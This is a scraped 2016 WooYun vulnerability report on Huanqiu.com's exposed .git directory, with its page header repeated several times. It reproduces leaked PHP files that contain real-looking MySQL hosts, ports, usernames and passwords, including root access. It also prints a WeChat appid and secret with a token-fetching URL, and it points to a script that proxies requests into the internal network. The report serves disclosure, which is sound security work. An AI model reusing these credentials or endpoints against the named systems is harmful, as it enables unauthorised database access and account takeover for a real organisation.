环球网.git漏洞泄漏mysql数据库，微信appid和secret

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0173146

漏洞标题：环球网.git漏洞泄漏mysql数据库，微信appid和secret

漏洞作者：陆由乙

提交时间：2016-01-28 12:05

修复时间：2016-02-02 12:10

公开时间：2016-02-02 12:10

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-28：细节已通知厂商并且等待厂商处理中
2016-02-02：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

为啥数据库不能外联啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊!
环球网微信号:huanqiu-com

详细说明：

http://interactive.huanqiu.com/.git/
用lijiejie的脚本。

漏洞证明：

copdb.php

<?php
//Open a new connection to the MySQL server
$mysqli = new mysqli('58.68.250.253','root','Hu#qU@bj%12!','wap',33061);
//Output any connection error
if ($mysqli->connect_error) {
    die('Error : ('. $mysqli->connect_errno .') '. $mysqli->connect_error);
}
//MySqli Select Query
$results = $mysqli->query("SELECT intro,title,author,content,unix_timestamp(pub_time) as `time` from article_content where source='环球时报' limit 50 --");
$counter = 0;
while($row = $results->fetch_assoc()) {
	if($counter == 50) break;
	$data[] = array('type'=>7,'status'=>0,'intro_title'=>$row['intro'],'title'=>$row['title'],'sub_title'=>'','authors'=>$row['author'],'summary'=>'','content'=>$row['content'],'doc_time'=>$row['time'],'page_num'=>0,'page_name'=>'','issue'=>'','page_pic'=>'','coords'=>'','pub_source'=>'','copyright_source'=>'','order_id'=>'');
	$counter ++;
}
$json = array('newsInfoList'=>$data,'pub_date'=>$row['time'],'issue'=>'','status'=>0,'timestamp'=>time(),'base_id'=>'','type'=>7);
echo json_encode($json);
// Frees the memory associated with a result
$results->free();
// close connection 
$mysqli->close();
exit();

baiduhot.php

<?php
set_time_limit(300);
$time = date("Y-m-d h:i:s");//当前时间
//获取百度数据源
$targeturl = 'http://api.m.baidu.com/?from=1011361e&pu=osname@baiduboxapp,csrc@bdbox_dsfrc_auto&qq-pf-to=pcqq.c2c';
$logpath = '/home/logs/baiduhot.log';
$baidujson = file_get_contents($targeturl);
$baiduhot = json_decode($baidujson,true);
//初始数据库连接
$mysqli = new mysqli("58.68.250.252" , "baiduhot" , "baiduhot@BJ%123" , "huanqiuwap1" ,33060) ;
$mysqli -> set_charset("utf8") ;
if ($mysqli -> connect_errno) {
    echo "Failed to connect to MySQL: (" . $mysqli -> connect_errno . ") " . $mysqli -> connect_error ;
}
for ($i=1; $i < 7; $i++) { 
  $word = $baiduhot['hot'][$i]['word'];
  $url = $baiduhot['hot'][$i]['url'];
  $sql= "UPDATE Baidu_hot set word='{$word}',url='{$url}',updatetime='{$time}' WHERE wordid=$i --";
  $status = $mysqli -> query($sql) ;
  $result[]=array('time'=>time(),'data'=>array('word'=>$word,'url'=>$url,'status'=>$status));
}
$mysqli -> close() ; //关闭mysql连接
$a = json_encode($result)."\n";
file_put_contents($logpath,$a,FILE_APPEND);
exit();
?>

waptotthz.php

<?php
$tmp = $_POST['wapid'];
$wapid = intval(strip_tags($tmp));
// $wapid = htmlspecialchars(string)
if(!empty($wapid) && $wapid > 0){
    $tthzid =false;
    $mysqli = new mysqli("58.68.250.252" , "baiduhot" , "baiduhot@BJ%123" , "huanqiuwap1" , 33060) ;
    $mysqli -> set_charset("utf8") ;
    if ($mysqli -> connect_errno) {
        echo "Failed to connect to MySQL: (" . $mysqli -> connect_errno . ") " . $mysqli -> connect_error ;
    }else{
        $sql = "SELECT NewsRss2.id,NewsRss2.newsid FROM NewsRss2 WHERE newsid = $wapid";
        $result = $mysqli->query($sql);
        $data = $result ->fetch_row();
	if(!empty($data[0])){	
	 $tthzid = $data[0];
	}
    }
    $mysqli -> close(); //关闭mysql连接
}else{
    return ;
}
$response = $tthzid?"<textarea><tr><td>$wapid</td><td>$tthzid</td><td><a href=\"http://tthz.huanqiu.com/viewTouTiao.html?newId=$tthzid&f=jrtt\">http://tthz.huanqiu.com/viewTouTiao.html?newId=$tthzid&f=jrtt<a></td></tr></textarea>":"<textarea><tr><td>$wapid</td><td>未找到</td><td>未找到</td></tr></textarea>";
echo $response;
exit;
?>

test1.php

<?php
echo file_get_contents('http://mirrors.huanqiu.com/php/get_wxtoken.php');
$ch = curl_init("http://mirrors.huanqiu.com/php/get_wxtoken.php") ;  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // 获取数据返回  
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ; // 在启用 CURLOPT_RETURNTRANSFER 时候将获取数据返回  
curl_setopt($ch, CURLOPT_PORT,'80') ; // 在启用 CURLOPT_RETURNTRANSFER 时候将获取数据返回 
echo $output = curl_exec($ch) ;
var_dump($output);exit();
?>

http://interactive.huanqiu.com/sougou.php?from=1
1-10可以获取内网的数据

<?php
if(isset($_GET['from'])){
	$from = substr($_GET['from'],0,10);
	echo file_get_contents('http://192.168.120.13/index.php?m=dbsource&c=hz&a=createXmlFor_sougou&from='.$from);
}else{
	echo 'error';
}
exit();
?>

{"ip_list":["101.226.62.77","101.226.62.78","101.226.62.79","101.226.62.80","101.226.62.81","101.226.62.82","101.226.62.83","101.226.62.84","101.226.62.85","101.226.62.86","101.226.103.59","101.226.103.60","101.226.103.61","101.226.103.62","101.226.103.63","101.226.103.69","101.226.103.70","101.226.103.71","101.226.103.72","101.226.103.73","140.207.54.73","140.207.54.74","140.207.54.75","140.207.54.76","140.207.54.77","140.207.54.78","140.207.54.79","140.207.54.80","182.254.11.203","182.254.11.202","182.254.11.201","182.254.11.200","182.254.11.199","182.254.11.198","59.37.97.100","59.37.97.101","59.37.97.102","59.37.97.103","59.37.97.104","59.37.97.105","59.37.97.106","59.37.97.107","59.37.97.108","59.37.97.109","59.37.97.110","59.37.97.111","59.37.97.112","59.37.97.113","59.37.97.114","59.37.97.115","59.37.97.116","59.37.97.117","59.37.97.118","112.90.78.158","112.90.78.159","112.90.78.160","112.90.78.161","112.90.78.162","112.90.78.163","112.90.78.164","112.90.78.165","112.90.78.166","112.90.78.167","140.207.54.19","140.207.54.76","140.207.54.77","140.207.54.78","140.207.54.79","140.207.54.80","180.163.15.149","180.163.15.151","180.163.15.152","180.163.15.153","180.163.15.154","180.163.15.155","180.163.15.156","180.163.15.157","180.163.15.158","180.163.15.159","180.163.15.160","180.163.15.161","180.163.15.162","180.163.15.163","180.163.15.164","180.163.15.165","180.163.15.166","180.163.15.167","180.163.15.168","180.163.15.169","180.163.15.170",""]}

get_wxtoken.php

<?php
if($_GET['par']=='wx133b04ad'){
$res = file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=wx133b04ad9003db0a&secret=79fbbcf462e668eb0f988d5821e32afc');
$res = json_decode($res, true);
$ticket  =  file_get_contents('https://api.weixin.qq.com/cgi-bin/ticket/getticket?access_token='.$res['access_token'].'&type=jsapi');
echo $ticket;
}
else{
	echo 'sfsdfdsferror';
}
exit();
?>

appid=wx133b04ad9003db0a
secret=79fbbcf462e668eb0f988d5821e32afc
http://mp.weixin.qq.com/debug/
http://interactive.huanqiu.com/get_wxtoken.php?par=wx133b04ad
动态token获取

修复方案：

删除

版权声明：转载请注明来源陆由乙@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-02-02 12:10

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0173146

漏洞标题：环球网.git漏洞泄漏mysql数据库，微信appid和secret

相关厂商：环球网

漏洞作者：陆由乙

提交时间：2016-01-28 12:05

修复时间：2016-02-02 12:10

公开时间：2016-02-02 12:10

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源陆由乙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0173146

漏洞标题：环球网.git漏洞泄漏mysql数据库，微信appid和secret

相关厂商：环球网

漏洞作者： 陆由乙

提交时间：2016-01-28 12:05

修复时间：2016-02-02 12:10

公开时间：2016-02-02 12:10

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0173146"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 陆由乙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：陆由乙

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源陆由乙@乌云